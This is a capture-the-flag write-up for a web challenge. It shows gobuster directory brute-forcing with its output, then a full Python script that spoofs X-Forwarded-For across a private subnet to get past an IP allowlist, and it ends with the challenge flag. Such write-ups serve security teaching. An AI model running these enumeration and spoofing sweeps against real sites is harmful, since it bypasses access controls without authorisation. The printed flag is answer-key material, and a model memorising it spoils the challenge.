WH01 - 500pts
Briefing
Access the site at https://cfta-wh01.allyourbases.co and find a way to get the flag from the CMS.
Solution
Since the website looks pretty empty we can try some directory busting:
gobuster dir -u https://cfta-wh01.allyourbases.co/ -t 200 --exclude-length 16 --extensions txt,html -w /usr/share/wordlists/dirb/common.txt

We use the common dirb list included with Kali and also check for files with txt or html extensions. --exclude-length 16 tells gobuster to ignore any response whose body is exactly 16 bytes long, which is how you filter out a constant catch-all page that would otherwise show up for many paths. gobuster output:

[+] Url: https://cfta-wh01.allyourbases.co/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] Exclude Length: 16
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,html
[+] Timeout: 10s
===============================================================
2021/04/08 19:43:11 Starting gobuster in directory enumeration mode
===============================================================
/admin.html (Status: 304) [Size: 0]
/index.html (Status: 200) [Size: 616]
/index.html (Status: 200) [Size: 616]
/readme.txt (Status: 200) [Size: 154]
/soap (Status: 200) [Size: 0]
===============================================================
2021/04/08 19:43:23 Finished
===============================================================
We find an interesting /admin.html, which comes back with an empty body, and /readme.txt, which says the following:

To use the CMS make sure to visit /admin.html from allowed IPs on the local network. Note: Tell engineering to stop moving the subnet from 192.168.0.0/24
So /admin.html only serves content when the request appears to come from an IP on the local network, and the note tells us the allowed range is 192.168.0.0/24. An application sitting behind a reverse proxy often takes the client address from the X-Forwarded-For HTTP header instead of from the TCP connection. That header is meant to be set by the proxy in front of the app, but if the app trusts it no matter who sent it, we can supply the header ourselves and claim any source IP we like, so let's try that.

We can use a Python script to loop through every IP in 192.168.0.0/24 and send a GET request to /admin.html with X-Forwarded-For set to the IP currently being tested. A rejected request returns an empty body (the 0-byte response gobuster reported), so if the length of the response is greater than 0 we print the response. This finds the flag after a few seconds.
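The following sweep is an added example for this writeup, not the original author's script. It uses only the Python standard library, assumes the allowlist is the 192.168.0.0/24 range named in /readme.txt, and treats any non-empty 200 response as an accepted address; the target URL and header name are the ones discussed above, while the helper names (candidate_ips, spoof_headers, is_hit, probe, sweep) are my own.

```python
"""Sweep X-Forwarded-For values across a subnet against an IP-restricted page.

Added example for this writeup (not the original author's script). Assumes the
app derives the client address from X-Forwarded-For and allowlists
192.168.0.0/24, as /readme.txt suggests.
"""
import ipaddress
import sys
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

TARGET = "https://cfta-wh01.allyourbases.co/admin.html"
SUBNET = "192.168.0.0/24"  # subnet named in /readme.txt
HEADER = "X-Forwarded-For"


def candidate_ips(cidr):
    """Every address in the subnet as a string, network and broadcast included,
    since we do not know which addresses the allowlist actually contains."""
    return [str(addr) for addr in ipaddress.ip_network(cidr)]


def spoof_headers(ip):
    """Headers claiming the request was forwarded on behalf of `ip`."""
    return {HEADER: ip}


def is_hit(status, body):
    """The denied case is a zero-length body (the 0-byte 304 gobuster saw);
    a 200 with content means the spoofed address was accepted."""
    return status == 200 and len(body) > 0


def probe(url, ip, timeout=10):
    """GET `url` with the spoofed header; returns (ip, status, body)."""
    req = urllib.request.Request(url, headers=spoof_headers(ip), method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return ip, resp.status, resp.read()
    except urllib.error.HTTPError as err:
        # urllib raises for every non-2xx status (304 included); keep the body.
        return ip, err.code, err.read()
    except (urllib.error.URLError, OSError):
        return ip, None, b""


def sweep(url, cidr, workers=20):
    """Probe every address in `cidr`; returns [(ip, body_text)] for accepted ones."""
    hits = []
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda addr: probe(url, addr), candidate_ips(cidr))
        for ip, status, body in results:
            if is_hit(status, body):
                hits.append((ip, body.decode("utf-8", errors="replace")))
    return hits


if __name__ == "__main__":
    for ip, text in sweep(TARGET, SUBNET):
        print(f"[+] {HEADER}: {ip} accepted\n{text}")
        break  # one accepted address is enough to read the CMS page
    else:
        sys.exit("no address in the subnet was accepted")
```

Because the rejected response is empty, the length check is a reliable oracle here; a more cautious version would compare against a baseline response taken without the header. If the application honoured a different proxy header instead (X-Real-IP, for example), only HEADER needs to change.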
Flag
iPSpooFinGWiThHopHeaDers91918